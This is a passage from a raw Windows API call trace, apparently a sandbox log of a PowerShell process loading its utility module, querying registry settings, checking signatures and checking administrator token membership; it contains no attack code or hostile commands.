lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x1000 [0090.270] ReadFile (in: 
hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.270] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x2000 [0090.270] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.271] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x3000 [0090.271] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.271] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x4000 [0090.272] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.272] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x5000 [0090.272] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.272] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x6000 
[0090.272] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x1000, lpOverlapped=0x0) returned 1 [0090.273] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x7000 [0090.273] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x778, lpOverlapped=0x0) returned 1 [0090.273] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x7778 [0090.273] ReadFile (in: hFile=0x4d8, lpBuffer=0x637e578, nNumberOfBytesToRead=0x88, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637e578*, lpNumberOfBytesRead=0x4ebd8c4*=0x0, lpOverlapped=0x0) returned 1 [0090.273] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebd898*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebd898*=0) returned 0x7778 [0090.273] ReadFile (in: hFile=0x4d8, lpBuffer=0x637ee6c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebd8c4, lpOverlapped=0x0 | out: lpBuffer=0x637ee6c*, lpNumberOfBytesRead=0x4ebd8c4*=0x0, lpOverlapped=0x0) returned 1 [0090.274] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebd82c, Length=0x20, ResultLength=0x4ebd89c | out: SystemInformation=0x4ebd82c, ResultLength=0x4ebd89c*=0x0) returned 0xc0000003 [0090.274] GetSystemInfo (in: lpSystemInfo=0x4ebd8a8 | out: lpSystemInfo=0x4ebd8a8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, 
wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0090.275] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebd838 | out: phkResult=0x4ebd838*=0x500) returned 0x0 [0090.275] RegQueryValueExW (in: hKey=0x500, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebd854, lpData=0x0, lpcbData=0x4ebd850*=0x0 | out: lpType=0x4ebd854*=0x0, lpData=0x0, lpcbData=0x4ebd850*=0x0) returned 0x2 [0090.275] RegCloseKey (hKey=0x500) returned 0x0 [0090.275] CloseHandle (hObject=0x4d8) returned 1 [0090.556] CoCreateGuid (in: pguid=0x4ebd96c | out: pguid=0x4ebd96c*(Data1=0xa7c3fb1, Data2=0x7181, Data3=0x4477, Data4=([0]=0xb3, [1]=0x98, [2]=0x9b, [3]=0x5e, [4]=0xa6, [5]=0xd4, [6]=0xcf, [7]=0x15))) returned 0x0 [0090.556] GetCurrentProcess () returned 0xffffffff [0090.557] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebd938 | out: TokenHandle=0x4ebd938*=0x500) returned 1 [0090.557] GetTokenInformation (in: TokenHandle=0x500, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4ebd938 | out: TokenInformation=0x0, ReturnLength=0x4ebd938) returned 0 [0090.558] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x42731a8 [0090.558] GetTokenInformation (in: TokenHandle=0x500, TokenInformationClass=0x8, TokenInformation=0x42731a8, TokenInformationLength=0x4, ReturnLength=0x4ebd938 | out: TokenInformation=0x42731a8, ReturnLength=0x4ebd938) returned 1 [0090.558] LocalFree (hMem=0x42731a8) returned 0x0 [0090.558] DuplicateTokenEx (in: hExistingToken=0x500, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x4ebd940 | out: phNewToken=0x4ebd940*=0x504) returned 1 [0090.558] CheckTokenMembership (in: TokenHandle=0x504, SidToCheck=0x641e720*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), 
SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x4ebd950 | out: IsMember=0x4ebd950) returned 1 [0090.558] CloseHandle (hObject=0x504) returned 1 [0090.564] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebd6dc | out: lpPerformanceCount=0x4ebd6dc*=1641338077477) returned 1 [0090.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.564] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd3c8) returned 1 [0090.565] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x4ebd68c | out: lpFileInformation=0x4ebd68c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0090.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd3c4) returned 1 [0090.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, 
lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0090.565] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1", lpFilePart=0x0) returned 0x71 [0090.565] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebd35c) returned 1 [0090.565] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1"), fInfoLevelId=0x0, lpFileInformation=0x4ebd620 | out: lpFileInformation=0x4ebd620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778)) returned 1 [0090.565] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebd358) 
returned 1 [0090.565] CoTaskMemAlloc (cb=0x10) returned 0x425e628 [0090.566] CoTaskMemAlloc (cb=0x10) returned 0x425e988 [0090.566] CoTaskMemAlloc (cb=0xe4) returned 0x33cef8 [0090.566] CoTaskMemAlloc (cb=0x30) returned 0x4248690 [0090.566] WinVerifyTrust () returned 0x800b0100 [0090.580] CoTaskMemFree (pv=0x425e628) [0090.580] CoTaskMemFree (pv=0x4248690) [0090.580] CryptCATHandleFromStore () returned 0x2bfe38 [0090.581] WTHelperGetProvSignerFromChain () returned 0x0 [0090.581] CoTaskMemAlloc (cb=0x10) returned 0x425e628 [0090.581] CoTaskMemAlloc (cb=0x30) returned 0x4248690 [0090.581] WinVerifyTrust () returned 0x0 [0090.581] CoTaskMemFree (pv=0x4248690) [0090.581] CoTaskMemFree (pv=0x425e628) [0090.581] CoTaskMemFree (pv=0x33cef8) [0090.581] CoTaskMemFree (pv=0x425e988) [0090.586] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0x2322b564, Data2=0x3260, Data3=0x4edf, Data4=([0]=0xa1, [1]=0x67, [2]=0x86, [3]=0x56, [4]=0x0, [5]=0x8a, [6]=0x5, [7]=0x13))) returned 0x0 [0090.587] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0x551efed6, Data2=0xf4bf, Data3=0x452b, Data4=([0]=0x8e, [1]=0xbd, [2]=0x3c, [3]=0x50, [4]=0x6e, [5]=0x7, [6]=0x25, [7]=0x24))) returned 0x0 [0090.587] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0xd851db6e, Data2=0x8b30, Data3=0x4985, Data4=([0]=0xa7, [1]=0x6, [2]=0x5f, [3]=0xbd, [4]=0x1, [5]=0x78, [6]=0xc0, [7]=0xec))) returned 0x0 [0090.587] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0x9ca0f407, Data2=0x9d71, Data3=0x4947, Data4=([0]=0x8b, [1]=0xc7, [2]=0x9f, [3]=0xe2, [4]=0x6a, [5]=0x54, [6]=0x8c, [7]=0xae))) returned 0x0 [0090.590] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0x2f7c23a8, Data2=0xab7, Data3=0x4eab, Data4=([0]=0xae, [1]=0x3, [2]=0x89, [3]=0xf7, [4]=0xfb, [5]=0xc3, [6]=0xcb, [7]=0x5a))) returned 0x0 [0090.590] CoCreateGuid (in: pguid=0x4ebd5b8 | out: pguid=0x4ebd5b8*(Data1=0x686ce901, Data2=0x98af, Data3=0x4edf, Data4=([0]=0x8a, 
[1]=0x37, [2]=0x8f, [3]=0x7e, [4]=0x54, [5]=0x1c, [6]=0x7, [7]=0xba))) returned 0x0 [0090.691] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.691] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.691] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x6441ccc, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.692] RegCloseKey (hKey=0x500) returned 0x0 [0090.692] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.692] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.692] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x6441fe0, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.692] RegCloseKey (hKey=0x500) returned 0x0 [0090.693] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.693] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: 
lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.693] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x64422dc, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.693] RegCloseKey (hKey=0x500) returned 0x0 [0090.693] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.693] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.693] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x64425e4, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.693] RegCloseKey (hKey=0x500) returned 0x0 [0090.694] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.694] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.694] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x6442904, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.694] RegCloseKey (hKey=0x500) returned 0x0 [0090.695] RegOpenKeyExW (in: hKey=0x80000002, 
lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.695] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.695] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x6442c18, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.695] RegCloseKey (hKey=0x500) returned 0x0 [0090.695] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe910 | out: phkResult=0x4ebe910*=0x500) returned 0x0 [0090.696] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x0, lpcbData=0x4ebe92c*=0x0 | out: lpType=0x4ebe930*=0x1, lpData=0x0, lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.696] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe930, lpData=0x6442f14, lpcbData=0x4ebe92c*=0x56 | out: lpType=0x4ebe930*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe92c*=0x56) returned 0x0 [0090.696] RegCloseKey (hKey=0x500) returned 0x0 [0090.697] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe95c | out: phkResult=0x4ebe95c*=0x500) returned 0x0 [0090.697] RegQueryValueExW (in: hKey=0x500, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe97c, lpData=0x0, lpcbData=0x4ebe978*=0x0 | out: lpType=0x4ebe97c*=0x1, lpData=0x0, lpcbData=0x4ebe978*=0x56) returned 0x0 [0090.697] RegQueryValueExW (in: hKey=0x500, 
lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x4ebe97c, lpData=0x644325c, lpcbData=0x4ebe978*=0x56 | out: lpType=0x4ebe97c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x4ebe978*=0x56) returned 0x0 [0090.697] RegCloseKey (hKey=0x500) returned 0x0 [0090.854] EtwEventActivityIdControl () returned 0x0 [0090.855] SetEvent (hEvent=0x4fc) returned 1 [0090.855] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x4ebecb8*=0x4fc, lpdwindex=0x4ebeadc | out: lpdwindex=0x4ebeadc) returned 0x0 [0090.857] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebec60, nSize=0xbc | out: lpBuffer="") returned 0x0 [0090.859] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0090.860] GetFileType (hFile=0xb) returned 0x2 [0090.861] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x4ebedf0 | out: lpMode=0x4ebedf0) returned 1 [0090.862] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x4ebedb0 | out: lpConsoleScreenBufferInfo=0x4ebedb0) returned 1 [0090.862] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x4ebedb0 | out: lpConsoleScreenBufferInfo=0x4ebedb0) returned 1 [0090.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0090.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0090.954] EtwEventActivityIdControl () returned 
0x0 [0090.954] EtwEventActivityIdControl () returned 0x0 [0090.954] EtwEventActivityIdControl () returned 0x0 [0091.064] GetCurrentProcess () returned 0xffffffff [0091.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebed04 | out: TokenHandle=0x4ebed04*=0x500) returned 1 [0091.073] GetCurrentProcess () returned 0xffffffff [0091.073] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebecc8 | out: TokenHandle=0x4ebecc8*=0x504) returned 1 [0091.074] GetCurrentProcess () returned 0xffffffff [0091.074] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebecd8 | out: TokenHandle=0x4ebecd8*=0x508) returned 1 [0091.074] CloseHandle (hObject=0x504) returned 1 [0091.076] CoTaskMemAlloc (cb=0x20c) returned 0x4277c60 [0091.076] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x4277c60 | out: lpBuffer="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\") returned 0x25 [0091.076] CoTaskMemFree (pv=0x4277c60) [0091.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x26 [0091.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\", nBufferLength=0x26, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x25 [0091.076] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\", lpszLongPath=0x4265bc8, cchBuffer=0x26 | out: lpszLongPath="C:\\Users\\5AlR3U30D3\\AppData\\Local\\mp\\") returned 0x28 [0091.078] LocalReAlloc (hMem=0x4265bc8, uBytes=0x50, uFlags=0x2) returned 0x4265bc8 [0091.078] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5ALR3U~1\\AppData\\Local\\Temp\\", lpszLongPath=0x4265bc8, cchBuffer=0x28 | out: lpszLongPath="C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\") returned 0x27 [0091.088] GetTokenInformation (in: 
TokenHandle=0x508, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4ebeca8 | out: TokenInformation=0x0, ReturnLength=0x4ebeca8) returned 0 [0091.089] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x42731c8 [0091.089] GetTokenInformation (in: TokenHandle=0x508, TokenInformationClass=0x8, TokenInformation=0x42731c8, TokenInformationLength=0x4, ReturnLength=0x4ebeca8 | out: TokenInformation=0x42731c8, ReturnLength=0x4ebeca8) returned 1 [0091.089] LocalFree (hMem=0x42731c8) returned 0x0 [0091.089] DuplicateTokenEx (in: hExistingToken=0x508, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x4ebecb0 | out: phNewToken=0x4ebecb0*=0x504) returned 1 [0091.089] CheckTokenMembership (in: TokenHandle=0x504, SidToCheck=0x6464cb4*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x4ebecc0 | out: IsMember=0x4ebecc0) returned 1 [0091.089] CloseHandle (hObject=0x504) returned 1 [0091.090] GetTokenInformation (in: TokenHandle=0x508, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4ebecf4 | out: TokenInformation=0x0, ReturnLength=0x4ebecf4) returned 0 [0091.090] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x4266220 [0091.090] GetTokenInformation (in: TokenHandle=0x508, TokenInformationClass=0x1, TokenInformation=0x4266220, TokenInformationLength=0x24, ReturnLength=0x4ebecf4 | out: TokenInformation=0x4266220, ReturnLength=0x4ebecf4) returned 1 [0091.091] LocalFree (hMem=0x4266220) returned 0x0 [0091.099] ConvertStringSecurityDescriptorToSecurityDescriptorW (in: StringSecurityDescriptor="D:(D;OI;SD;;;S-1-5-21-3683305739-1236715609-858405165-1000)(A;OICI;FA;;;BA)S:(ML;OI;NW;;;HI)", StringSDRevision=0x1, SecurityDescriptor=0x4ebecec, SecurityDescriptorSize=0x0 | out: SecurityDescriptor=0x4ebecec*=0x0*(Revision=0x1, Sbz1=0x0, Control=0x8014, 
